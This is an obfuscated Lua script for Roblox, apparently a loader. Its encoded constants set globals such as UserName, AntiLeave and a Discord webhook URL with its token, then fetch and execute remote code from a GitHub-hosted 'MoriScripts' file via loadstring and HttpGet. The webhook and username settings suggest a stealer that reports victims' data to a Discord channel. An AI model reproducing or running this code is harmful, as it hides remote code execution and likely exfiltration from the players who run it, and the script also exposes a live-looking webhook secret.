--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==7) then function v30(v31,v32,v33)local v34=v31[1];local v35=v31[2];local v36=v31[3];return function(...)local v67=v34;local v68=v35;local v69=v36;local v70=v28;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v81=0,v75 do if (v81>=v69) then v73[v81-v69 ]=v74[v81 + 1 ];else v77[v81]=v74[v81 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v82=0;while true do if (v82==1) then if (v80<=9) then if (v80<=4) then if (v80<=1) then if (v80==0) then local v118=0;local v119;while true do if (0==v118) then v119=v79[2];v77[v119]=v77[v119](v13(v77,v119 + 1 ,v72));break;end end else v33[v79[3]]=v77[v79[2]];end elseif (v80<=2) then local v122=0;local v123;local v124;local v125;local v126;while true do if (v122==1) then v72=(v125 + v123) -1 ;v126=0;v122=2;end if (v122==2) then for v166=v123,v72 do local v167=0;while true do if (v167==0) then v126=v126 + 1 ;v77[v166]=v124[v126];break;end end end break;end if (v122==0) then v123=v79[2];v124,v125=v70(v77[v123](v13(v77,v123 + 1 ,v79[3])));v122=1;end end elseif (v80==3) then v33[v79[3]]=v77[v79[2]];else local v144=0;local v145;local v146;while true do if (v144==1) then v77[v145 + 1 ]=v146;v77[v145]=v146[v79[4]];break;end if (v144==0) then v145=v79[2];v146=v77[v79[3]];v144=1;end end end elseif (v80<=6) then if (v80>5) then v77[v79[2]][v79[3]]=v79[4];else v77[v79[2]][v79[3]]=v79[4];end elseif (v80<=7) then v77[v79[2]]();elseif (v80>8) then v77[v79[2]]();else v77[v79[2]]=v79[3]~=0 ;end elseif (v80<=14) then if (v80<=11) then if (v80==10) then v77[v79[2]]=v79[3];else v77[v79[2]]=v33[v79[3]];end elseif (v80<=12) then local v135=0;local v136;while true do if (v135==0) then v136=v79[2];v77[v136]=v77[v136](v13(v77,v136 + 1 ,v72));break;end end elseif (v80==13) then do return;end else local v148=0;local v149;local v150;local v151;local v152;while true do if (v148==1) then v72=(v151 + v149) -1 ;v152=0;v148=2;end if (v148==2) then for v179=v149,v72 do v152=v152 + 1 ;v77[v179]=v150[v152];end break;end if (v148==0) then v149=v79[2];v150,v151=v70(v77[v149](v13(v77,v149 + 1 ,v79[3])));v148=1;end end end elseif (v80<=16) then if (v80==15) then v77[v79[2]]=v79[3]~=0 ;else v77[v79[2]]=v33[v79[3]];end elseif (v80<=17) then do return;end elseif (v80>18) then v77[v79[2]]=v79[3];else local v155=v79[2];local v156=v77[v79[3]];v77[v155 + 1 ]=v156;v77[v155]=v156[v79[4]];end v71=v71 + 1 ;break;end if (v82==0) then v79=v67[v71];v80=v79[1];v82=1;end end end end;end return v30(v29(),{},v17)(...);end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v37)if (v1(v37,2)==79) then v20=v0(v3(v37,1,1));return "";else local v83=v2(v0(v37,16));if v20 then local v96=v5(v83,v20);v20=nil;return v96;else return v83;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v38,v39,v40,v41=v1(v16,v19,v19 + (5 -2) );v19=v19 + (12 -8) ;return (v41 * ((16778762 -(214 + 713)) -(555 + 64))) + (v40 * (66467 -(857 + 74))) + (v39 * (732 -476)) + v38 ;end v25=nil;v18=4;end if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v42,v43,v44)if v44 then local v84=0 + 0 ;local v85;while true do if (v84==(0 + 0)) then v85=(v42/((879 -(282 + 595))^(v43-(1638 -(1523 + 114)))))%((2 + 0)^(((v44-(1 -0)) -(v43-(1066 -(68 + 997)))) + 1)) ;return v85-(v85%1) ;end end else local v86=(2227 -(892 + 65)) -(226 + 1044) ;local v87;while true do if (v86==(0 -(0 -0))) then v87=(119 -(32 + 85))^(v43-(1 -0)) ;return (((v42%(v87 + v87))>=v87) and (1 + 0)) or (0 + 0) ;end end end end v22=nil;v18=2;end if (v18==2) then function v22()local v45=0 -0 ;local v46;while true do if (v45==(181 -(67 + 113))) then return v46;end if (v45==(350 -(87 + 263))) then v46=v1(v16,v19,v19);v19=v19 + 1 + 0 ;v45=2 -(1 + 0) ;end end end v23=nil;function v23()local v47=0;local v48;local v49;while true do if (v47==(0 -(0 -0))) then v48,v49=v1(v16,v19,v19 + (954 -(802 + 88 + 62)) );v19=v19 + (5 -3) ;v47=1 -0 ;end if (v47==(1 + 0)) then return (v49 * (1253 -(915 + 82))) + v48 ;end end end v18=3;end if (v18==4) then function v25()local v50=v24();local v51=v24();local v52=773 -(201 + 571) ;local v53=(v21(v51,1 -0 ,1207 -((2207 -(116 + 1022)) + 118) ) * ((4 -2)^(69 -37))) + v50 ;local v54=v21(v51,4 + 17 ,31);local v55=((v21(v51,56 -24 )==(1 + 0)) and  -(792 -(368 + 423))) or (3 -2) ;if (v54==0) then if (v53==(18 -((41 -31) + 8))) then return v55 * (0 -0) ;else local v97=442 -(245 + 171 + 26) ;while true do if (v97==(0 -0)) then v54=1 + 0 ;v52=0;break;end end end elseif (v54==2047) then return ((v53==(0 -(0 -0))) and (v55 * ((439 -(145 + 293))/(430 -(44 + 386))))) or (v55 * NaN) ;end return v8(v55,v54-(2509 -(998 + 488)) ) * (v52 + (v53/((1 + 1)^(43 + 9)))) ;end v26=nil;function v26(v56)local v57=0;local v58;local v59;while true do if (v57==(10 -7)) then return v6(v59);end if (v57==(860 -((3854 -3040) + 45))) then v58=v3(v16,v19,(v19 + v56) -(2 -1) );v19=v19 + v56 ;v57=1 + 1 ;end if (v57==(1 + 1)) then v59={};for v98=886 -(261 + 624) , #v58 do v59[v98]=v2(v1(v3(v58,v98,v98)));end v57=4 -1 ;end if (v57==(1080 -(1020 + 60))) then v58=nil;if  not v56 then v56=v24();if (v56==(1423 -(630 + 313 + 480))) then return "";end end v57=3 -2 ;end end end v18=5;end if (v18==6) then v29=nil;function v29()local v60=0;local v61;local v62;local v63;local v64;local v65;local v66;while true do if (v60==(0 -0)) then local v88=0 + 0 ;local v89;while true do if (v88==(0 -0)) then v89=0 -0 ;while true do if (v89~=(869 -(550 + 317))) then else v60=1;break;end if (v89==(1 -0)) then local v110=0 -0 ;while true do if (v110==(2 -1)) then v89=2;break;end if (v110==0) then v63={};v64={v61,v62,nil,v63};v110=1991 -(582 + 1408) ;end end end if (v89~=(0 -0)) then else local v111=0;while true do if (v111==0) then v61={};v62={};v111=1 -0 ;end if ((3 -2)~=v111) then else v89=1825 -(1195 + 629) ;break;end end end end break;end end end if (1==v60) then local v90=0 -0 ;local v91;while true do if (0==v90) then v91=241 -(187 + 54) ;while true do if (v91~=(782 -(162 + 618))) then else v60=2 + 0 ;break;end if (v91~=(0 + 0)) then else local v112=0 -0 ;while true do if (1==v112) then v91=1;break;end if (0~=v112) then else v65=v24();v66={};v112=1;end end end if ((1 -0)==v91) then for v114=1,v65 do local v115=0 + 0 ;local v116;local v117;while true do if (v115~=0) then else v116=v22();v117=nil;v115=1637 -(1373 + 263) ;end if (v115==(1001 -(451 + 549))) then if (v116==(1 + 0)) then v117=v22()~=0 ;elseif (v116==2) then v117=v25();elseif (v116~=3) then else v117=v26();end v66[v114]=v117;break;end end end v64[3]=v22();v91=2 -0 ;end end break;end end end if (v60~=2) then else for v100=1 -0 ,v24() do local v101=1384 -(746 + 638) ;local v102;local v103;local v104;local v105;while true do if ((0 + 0)~=v101) then else v102=0 -0 ;v103=nil;v101=1;end if (v101==1) then v104=nil;v105=nil;v101=2;end if (v101~=2) then else while true do if (v102==0) then v103=341 -(218 + 123) ;v104=nil;v102=1;end if (1~=v102) then else v105=nil;while true do if ((1581 -(1535 + 46))==v103) then local v141=0;while true do if (v141~=(1 + 0)) then else v103=1;break;end if (v141==0) then local v165=0 + 0 ;while true do if (v165==(560 -(306 + 254))) then v104=0 + 0 ;v105=nil;v165=1 -0 ;end if (v165==1) then v141=1468 -(899 + 568) ;break;end end end end end if (v103==(1 + 0)) then while true do if (v104==0) then v105=v22();if (v21(v105,2 -1 ,604 -(268 + 335) )~=0) then else local v174=0;local v175;local v176;local v177;local v178;while true do if (v174~=(290 -(60 + 230))) then else v175=0;v176=nil;v174=1;end if (v174~=(573 -(426 + 146))) then else v177=nil;v178=nil;v174=1 + 1 ;end if (v174==(1458 -(282 + 1174))) then while true do if (v175~=3) then else if (v21(v177,3,814 -(569 + 242) )==1) then v178[11 -7 ]=v66[v178[4]];end v61[v100]=v178;break;end if (v175==(1 + 0)) then local v185=1024 -(706 + 318) ;while true do if (v185~=0) then else v178={v23(),v23(),nil,nil};if (v176==0) then local v191=0;local v192;local v193;while true do if ((0 -0)==v191) then local v200=0;while true do if (v200==(0 + 0)) then v192=0;v193=nil;v200=701 -(271 + 429) ;end if (v200~=(1 + 0)) then else v191=1;break;end end end if (v191==(1501 -(1408 + 92))) then while true do if (v192~=(1086 -(461 + 625))) then else v193=0;while true do if (v193~=(1288 -(993 + 295))) then else v178[3]=v23();v178[4]=v23();break;end end break;end end break;end end elseif (v176==(1 + 0)) then v178[3]=v24();elseif (v176==2) then v178[1174 -(418 + 753) ]=v24() -((1 + 1)^16) ;elseif (v176==(1 + 2)) then local v202=0 + 0 ;local v203;local v204;while true do if (v202==(0 + 0)) then v203=529 -(406 + 123) ;v204=nil;v202=1770 -(1749 + 20) ;end if (v202==1) then while true do if (0~=v203) then else v204=0 + 0 ;while true do if (v204==(1322 -(1249 + 73))) then v178[2 + 1 ]=v24() -((1147 -(466 + 679))^16) ;v178[9 -5 ]=v23();break;end end break;end end break;end end end v185=2 -1 ;end if (1==v185) then v175=1902 -(106 + 1794) ;break;end end end if ((1 + 1)~=v175) then else local v186=0;while true do if (v186==0) then if (v21(v177,1 + 0 ,2 -1 )~=(2 -1)) then else v178[116 -(4 + 110) ]=v66[v178[2]];end if (v21(v177,2,586 -(57 + 527) )~=(1428 -(41 + 1386))) then else v178[106 -(17 + 86) ]=v66[v178[3]];end v186=1;end if (v186==1) then v175=3 + 0 ;break;end end end if (v175==(0 -0)) then local v187=0 -0 ;local v188;while true do if (v187==0) then v188=166 -(122 + 44) ;while true do if (v188==(1 -0)) then v175=1;break;end if (0~=v188) then else local v198=0 -0 ;while true do if (v198==(1 + 0)) then v188=1;break;end if (v198==(0 + 0)) then v176=v21(v105,2,3);v177=v21(v105,4,6);v198=1;end end end end break;end end end end break;end end end break;end end break;end end break;end end break;end end end for v106=1 -0 ,v24() do v62[v106-1 ]=v29();end return v64;end end end v30=nil;v18=7;end end end v15("LOL!0E3O0003083O00557365724E616D6503073O006264724O3003073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31333633363537313237342O3739302O33372F5451566130466A53506A693534646E7773713067664E4167746441713444346C4341486A52392O454756544763696D35554B582D354C4E2O6B474A537769557766466D3503093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O00120A3O00023O0012033O00013O00120A3O00043O0012033O00033O00120A3O00023O0012033O00053O0012103O00063O0030063O000700080012103O00063O0030063O000900080012103O00063O0030063O000A00080012103O000B3O0012100001000C3O00200400010001000D00120A0003000E4O000F000400014O0002000100044O000C5O00022O00073O000100012O00113O00017O00",v9(),...);